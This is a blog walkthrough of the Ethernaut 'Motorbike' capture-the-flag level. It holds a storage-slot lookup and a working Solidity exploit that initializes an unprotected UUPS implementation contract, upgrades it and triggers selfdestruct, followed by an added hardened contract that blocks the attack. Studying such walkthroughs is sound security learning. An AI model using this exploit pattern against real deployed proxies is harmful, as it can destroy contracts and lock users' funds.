# Smart Contract Hacking Ethernaut: 25. Motorbike

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-25-motorbike

## Content

Ethernaut is a wargame developed by OpenZeppelin around the Solidity programming language; each level has a smart contract that needs to be hacked.

### Tutorials

- GitHub - attack code
- Bilibili - video tutorial
- YouTube - video tutorial
- TikTok - ….

### Challenge

Make the motorbike contract unusable.

### Hack approach

…

Read the engine contract address from the storage slot:

```javascript
// The slot is the ERC-1967 implementation slot; the returned 32-byte word holds the engine address.
await web3.eth.getStorageAt(instance, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')
```

Run the attack against the engine contract address:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal interface of the engine (implementation) contract.
interface IEngine {
    function initialize() external;
    function upgradeToAndCall(address newImplementation, bytes memory data) external payable;
}

// Replacement "implementation" whose initialize() self-destructs the caller's context.
contract _motorbikeHackTool {
    function initialize() external {
        selfdestruct(payable(msg.sender));
    }
}

contract MotorbikeHack {
    IEngine public exploitInst;

    constructor(address _target) {
        exploitInst = IEngine(_target);
        // Call the engine directly (not through the proxy) so this contract becomes its upgrader.
        exploitInst.initialize();
        // Upgrade the engine to the tool contract and delegatecall its initialize().
        exploitInst.upgradeToAndCall(address(new _motorbikeHackTool()), abi.encodeWithSignature("initialize()"));
    }
}
```

### Hack case

…

### Defense approach

…

### References

- ERC-1967: Proxy Storage Slots
- UUPS Proxies: Tutorial (Solidity + JavaScript)
- packages/core/contracts/Initializable.sol
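
The attack in this post depends on the engine accepting `initialize()` and `upgradeToAndCall()` when it is called directly rather than through the proxy. As an added example (not from the original post, and not OpenZeppelin's or Ethernaut's code), the following minimal implementation contract locks its own initializer at deployment and rejects direct upgrade calls; the names `HardenedEngine`, `self` and `onlyProxy` are assumptions chosen for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

// Added example (not the Ethernaut Engine source): a minimal implementation
// contract that cannot be initialized or upgraded by calling it directly.
contract HardenedEngine {
    // ERC-1967 implementation slot, the same slot read in the post.
    bytes32 internal constant IMPLEMENTATION_SLOT =
        0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    // Address of this implementation, fixed in bytecode at deployment.
    address private immutable self = address(this);

    bool private initialized;
    address public upgrader;

    constructor() {
        // Runs in the implementation's own storage and locks initialize() there.
        // The proxy's storage is untouched, so the proxy can still initialize once.
        initialized = true;
    }

    // Reject direct calls: under delegatecall, address(this) is the proxy.
    modifier onlyProxy() {
        require(address(this) != self, "must be called through proxy");
        _;
    }

    function initialize() external {
        require(!initialized, "already initialized");
        initialized = true;
        upgrader = msg.sender;
    }

    function upgradeToAndCall(address newImplementation, bytes memory data)
        external payable onlyProxy
    {
        require(msg.sender == upgrader, "not upgrader");
        require(newImplementation.code.length > 0, "not a contract");
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly { sstore(slot, newImplementation) }
        if (data.length > 0) {
            (bool ok, ) = newImplementation.delegatecall(data);
            require(ok, "setup call failed");
        }
    }
}
```

Deployed behind a proxy that delegatecalls `initialize()` once, this contract reverts on both calls made by `MotorbikeHack`, because each targets the implementation address directly.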